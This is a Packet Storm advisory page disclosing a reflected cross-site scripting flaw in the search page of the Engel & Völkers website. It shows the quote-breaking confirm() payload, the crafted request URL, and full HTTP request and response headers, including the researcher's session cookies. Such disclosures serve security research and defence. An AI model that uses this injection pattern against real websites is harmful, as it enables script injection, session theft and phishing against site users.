what you don't know can hurt you

Engel Voelkers Cross Site Scripting

Engel Voelkers Cross Site Scripting
Posted May 28, 2018
Authored by Ismail Tasdelen

www.engelvoelkers.com suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | c6735ebd3b2429471544656ab00806de

Engel Voelkers Cross Site Scripting

Change Mirror Download
# Exploit Title: [ Reflected XSS at Engel Voelkers ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.engelvoelkers.com/]

# Software Link: [ Engel Voelkers Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : residential'-confirm(/Ismail Tasdelen/)-'

# HTTP REQUEST HEADER :

Request URL: https://www.engelvoelkers.com/en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
Request Method: GET
Status Code: 200
Remote Address: 130.211.26.108:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.engelvoelkers.com
:method: GET
:path: /en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: nbu=4b33b1ea-61d0-11e8-96d5-42010a103302; signature=4da87ca2e51b5650fefa58627a5b8e70a10bf0425369cef6cb90534ea2c768be; verify=NGIzM2IxZWEtNjFkMC0xMWU4LTk2ZDUtNDIwMTBhMTAzMzAyOyUyZmVuJTJmc2VhcmNoJTJmJTNmYnVzaW5lc3NBcmVhJTNkcmVzaWRlbnRpYWwlMjUyNy1jb25maXJtJTI1MjglMjUyRklzbWFpbCUyNTIwVGFzZGVsZW4lMjUyRiUyNTI5LSUyNTI3JTI2c3JjaCUzZHNlYXJjaC10ZXh0JTI2cSUzZCUyNmZhY2V0cyUzZGNudHJ5JTI1M0ElMjUzQjtTdW4sIDI3IE1heSAyMDE4IDE3OjA2OjI3IEdNVA==; _ga=GA1.2.744261947.1527435138; _gid=GA1.2.959267156.1527435138; nbu=06e7d858-dec2-4d6f-ad04-b67e05551ffd; engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; _icl_current_language=en; evlocale=en_TR; BIGipServergroup-rz-webfe-prod=235738028.20480.0000; _gat_ev_com=1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
age: 0
alt-svc: clear
cache-control: max-age=0, proxy-revalidate, no-cache, no-store, must-revalidate, private
content-encoding: gzip
content-language: en-TR
content-type: text/html;charset=utf-8
date: Sun, 27 May 2018 17:07:33 GMT
ev-revision: ce7e759467f9281d7107826ce514d214b3f4cb0a
ev-version: P-12.4.1-FRONTEND
expires: 0
expires: Tue, 01 Jan 1980 1:00:00 GMT
pragma: no-cache
server: Apache
set-cookie: engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; Path=/
set-cookie: _icl_current_language=en; Path=/
set-cookie: evlocale=en_TR; Path=/
set-cookie: evlocale=en_TR; Path=/
status: 200
vary: X-MCS-LB-Info-S,Accept-Encoding
via: 1.1 google

# Query String Parametres :

businessArea: residential'-confirm(/Ismail Tasdelen/)-'
srch: search-text
q:
facets: cntry:;

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close